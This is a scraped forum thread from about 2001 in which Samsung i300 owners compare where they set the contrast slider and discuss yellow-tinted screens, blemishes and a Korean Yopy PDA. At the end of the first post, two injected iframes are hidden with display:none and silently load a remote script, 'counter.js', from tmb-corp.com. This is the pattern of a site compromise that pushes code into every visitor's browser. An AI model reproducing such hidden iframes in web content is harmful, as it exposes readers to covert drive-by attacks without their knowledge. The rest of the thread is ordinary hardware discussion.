Poll: What is the position of your contrast slider?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

Poll: Contrast Slider Position

A collegue of mine just picked up an I300.... I was showing her how to adjust the contrast on her unit and noticed that the optimum setting for her's is just about in the middle, maybe a little to the right...

on my unit.... I have to have the slider 7/8th's to the right to acheive the same quality/contrast display as her's....

is this abnormal? where do you all have contrast slider set to?

thanks for your reports....

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i have found my favorite possition to be placing the cursor just under the "a" in "Contrast"

Contrast on i300 Inconsistent

I seemed to have lucked-out, as I only need a 1/4 to 1/3 setting on my phone. I have compared mine with 3 other i300's, and the others are not nearly as "white" as mine at the same setting. I think it's safe to say that Samsung is going to have to address this problem with their next device.

on my 300, there are definately some tradeoffs where contrast is concerned. slide the contrast to the right, and the colors become more saturated and the display less blindingly bright, but the "smear" becomes pretty bad.

Administrator

Arrow

im with davy d on this..

also the temp of the screen wiill cause a little contrast change...

fikse, my setting is near yours also.. i hate going all the way over like that.. but now i know iim not alone....

maybe its from early production models? I got mine from the first shipment to hit stores.... compusa...

Brooks

Mine is just about all the way (7/8ths) to the right as well. Was one of the ones from the first shipment to Compusa too.

Administrator

Arrow

i got mine directly from sprint.. so i guess we are all in the same boat....

Unhappy Yellow Screen Noticed on Some Units

Hello All,

I discovered something about the I300s that might be involved with why everyones sees a difference in contrast when comparing I300 units. I have the top of the screen blemish mentioned in another topic in this forum. I went to Best Buy to exchange my unit for another one. But when I compared my unit to three other units I found that the three other units had a yellowish tint on their screen when compared to my unit. I did not see the blemish on these units but the yellow tinted screen was a much more annoying screen artifact. SO I kept my unit. It seems like Samsung may have some quality control issues with the screens for the I300. I am open for suggestions...
    EMR

Administrator

Arrow

my pone has more of sa yellowish hue to the screen.. i have yet to se the blemish near theVM icon you guys have mentioned...

Is this concern one that can be fully eliminated? I would imagine that if the screen were active matrix we'd all be thrilled, but maybe this is as good as it gets for the current I300 model. Seems like there are so many factors that could contribute to blemishes.

Just found a page on the new YOPY! Its only a PDA being marketed by Samsung. My eyes began to water when I saw this bad mother... Check it out! Lets you know where Samsung is headed.

could you post a link?

This is not the model to which I am referring. Apparently this one is old news in Korea. Looks a bit familiar.
    Attached Thumbnails Attached Thumbnails Poll: Contrast Slider Position-yopi_150.jpg  
    Last edited by mjorange; 12-21-2001 at 06:12 PM.

Their sleek new PDA at www.gmate.co.kr/...
    Attached Thumbnails Attached Thumbnails Poll: Contrast Slider Position-yopy.jpg  

Administrator

Arrow

yo mj.

does this thing have a phone on it? if not, it wont appeal to me...

look cute though... :p

No such luck, Marc. My sentiments exactly. I'm sure I'd have a lot of fun with this baby, but it needs a phone. Some of you guys would be attracted to it's easy programmability. I think thats a word. From what I read, the device was designed for the tech junky who wants to customize his, or her, own system.

Administrator

Arrow

hmm.. that does sound pleasing to the ear... but no phone??? in this day and age convergence is it!! it would be hard for me to go back to a seperate phone and pda...

I agree. Both PDA's were introduced by a small start up company in Korea anxious to find an investor to run with the production. In steps Samsung. If the first PDA hit the streets there in January 2000, that certinly would give Samsung enough time to design an even more convenient model to relese here by Fall 2001.

Getting back to the original topic...

My current i300 (from BBuy) has a nice white screen and the contrast ends up being set just to the right of 1/2 way. My 1st i300 from Sprint had slightly 'yellower' screen and the contrast had to be set to 7/8 or more to get a decent colors. (However...you could slide the contrast all the way to the left and use the screen as a flashlight!)

I like the one from BBuy better...I think there's a variance in screen qualities across the board...